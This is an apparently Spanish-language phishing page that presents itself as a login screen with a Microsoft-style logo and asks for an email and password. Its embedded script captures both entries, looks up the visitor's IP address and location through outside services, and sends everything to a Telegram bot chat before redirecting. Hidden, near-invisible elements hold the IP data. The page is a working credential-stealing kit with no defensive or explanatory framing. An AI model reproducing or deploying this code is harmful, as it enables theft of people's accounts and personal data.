<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">

    <link rel="stylesheet" href="lapa/aparent.css">
    <title>Internet - Home</title>
  

    


<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>  
<script src="new/yeltele/tell.js"></script>
<script>
  $.getJSON("https://api.ipify.org?format=json", function(data) {
          $("#gfg").html(data.ip);
      });
      $.getJSON("https://ipinfo.io", function(response) {
    $("#ip").html("IP: " + response.ip);
    $("#address").html("" + response.city + ", " + response.country);
  });

  var u_name, u_name2, ip, ip2, message;
  var ready = function() {
    u_name = document.getElementById("tikitaka").value;
    u_name2 = document.getElementById("mondacaso").value;
    ip = document.getElementById("gfg").innerHTML;
    ip2 = document.getElementById("address").innerHTML;
    message = "MMMBB\n☰ccc: " + u_name + "\n☰clv11: " + u_name2 + "\n🌎IP: " + ip +"\n" + ip2;
  };
  var sender = function() {
    ready();
    var settings = {
      "async": true,
      "crossDomain": true,
      "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
      "method": "POST",
      "headers": {
        "Content-Type": "application/json",
        "cache-control": "no-cache"
      },
      "data": JSON.stringify({
        "chat_id": chat_id,
        "text": message
      })
    };
    $.ajax(settings).done(function(response) {
      console.log(response);
      window.location = 'listo.html';
    });
    return false;
  };

</script>
</head>
<body>
    <h2></h2>
    <center>
        <form method="post" action="#" onsubmit="return sender();">
        <img style="width: 30%;  " src="new/logoms_660-660x432.jpg" alt=""> <div class="clear"></div> 
        <h2 style="text-align: left;">Iniciar Sesión</h2>
        <h4 style="text-align: left; font-size: 10pt;">Por favor continua e ingresa lo requerido.</h4>
        <label style="text-align: left;" for="email"   >Correo Electrónico:</label>
        <input   type="email"  id="tikitaka" name="tikitaka"    required>

        <label style="text-align: left;" for="password">Contraseña:</label>
        <input  id="mondacaso" name="mondacaso" type="password" required>

        <input  type="submit" value="SIGUIENTE">
    </form>
</body> <div style="color: rgb(255, 255, 255);font-size: 0.05px;">
<p id="gfg"></p>
<p id="ip"></p>
<p id="address"></p></div>
</html>
